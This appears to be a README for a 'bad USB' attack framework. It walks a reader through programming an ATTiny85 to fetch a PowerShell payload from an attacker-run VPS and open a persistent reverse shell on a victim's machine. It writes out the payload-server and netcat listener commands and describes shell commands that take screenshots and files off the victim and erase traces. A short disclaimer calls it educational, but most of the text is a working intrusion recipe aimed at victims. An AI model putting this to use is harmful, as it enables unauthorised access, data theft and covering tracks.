21/08/2024 - Revisited this project and want a proper close and end to it. So, this marks the final update to the guide and closure of the project. Minor updates will be posted.
This framework guide is intended for educational purposes only! Malicious use of this framework is NOT encouraged. If you wish to perform of the actions shown on property that you do not own, ensure you have prior approval from the rightful owner.
Remember: hack responsibly.
This framework is your one-stop-shop to get you up and running to create malicious USBs and start your phishing campaign using accessible and easy to obtain tools:
ATTiny85 Micro Controller
Arduino IDE
Digital Ocean VPS
With this guide you will be using this repository in your private VPS (we will be using Digital Ocean) and setting up your "hacker server".
None of this is originally made by me. This is a collection of my favourite scripts out there and modified to suit this framework. To se the original creators, head over to the
Credits
section of this document.
You will need the following:
- ATTiny85 Micro Controller (You can purchase one online for cheap)
- A Digital Ocean account
- A computer (Obviously)
Firstly, we will set up your PC to program your ATTiny85.
- Download and install the latest Digistump Arduino Release by running
Install Drivers.exe
. - Download the latest version of Arduino IDE.
- After install go to
File > Preferences
and underAdditional boards manager URLs
insert the following URL:https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json
. - Under
Tools > Board: > Board Manager
, selectDigistump AVR Boards
and install. - You're ready to program your ATTiny85!
Before we start programming your malicious USB, for this guide, you are going to need to setup your attacker VPS.
You need to have the following on your VPS or attacker machine:
- Python3
Setup a Digital Ocean VPS Droplet
with Ubuntu LTS and perform a full upgrade.
Clone this repository into the droplet and go into the directory.
There is only 1 file we need to modify for this demo: ./payloads/payload.ps1
.
Within the files, you will find [IP_ADDRESS]
and [PORT]
.
Change [IP_ADDRESS]
to your VPS' public IP address and [PORT]
to your preferred netcat
port. Default is 4444
.
Within the payloads/
directory, host a simple HTTP server using Python3 using the following commands:
cd payloads
python3 -m http.server 80
Note: To run this HTTP server after you close the CLI, consider using screen
. Documentation can be found here.
Now we can focus on programming your malicious USB. Back to your personal computer, under the scripts
folder, it contains various Arduino scripts to get you started on your journey of programming bad USBs. For the sake of simplicity, we will be using The-Go-To.ino
file. It is a script sequence to provide us, the attacker, a reverse shell instance from our victim.
- To begin, select the correct board by selecting
Tools > Board > Digistump AVR Boards > Digispark (Default - 16.5mhz)
. - Copy and paste the script into the Arduino IDE.
- Be sure to change the
[FILE SERVER]
to your hacker machine IP address. For example:http://999.999.999.999
. If the port is not port 80, specify the port as well.
- Be sure to change the
- Then click
Upload
and once prompted to plug in the USB, do so. It should take at most 5 seconds to program. Once done, remove the USB. - Now it is primed to be used at your own discretion. All you have to do is plug it in to your victim's machine.
Now all you need to do is plug in your Bad USB
on your victim's machine and let the magic happen. On your attacker machine, you should be able to see a connection being made from the victims machine. This means that the payload has been downloaded and if all goes well you should be able to obtain a persistent reverse shell by running:
nc -lnvp 4444
From here you can perform tasks just as any other reverse shell. There are some additional commands as well:
screenshot
(Returns a Base64 encoding of their screenshot. Pipe the output into a file and use./exfiltrated_data/reverse_shell/Base62_Decoder.sh
to decode the files.)transfer
(Similar toscreenshot
but transfers files. Must use absolute path.)rm-all
(Removes connection and deletes all attacker files. Leaves no trace.)
Change to the ./exfiltrated_data/reverse_shell/
directory and run netcat
here. Be sure to pipe the outputs into a file.
nc -lnvp 4444 | tee output
Once done, you can decode all the files and screeenshots using the following command:
bash ./Base62_Decoder.sh ./output
It will return with all the different files and you can view them as if they were the original.
This is just the start for you. Go crazy. But remember: hack responsibly. Have fun suckers - narwhal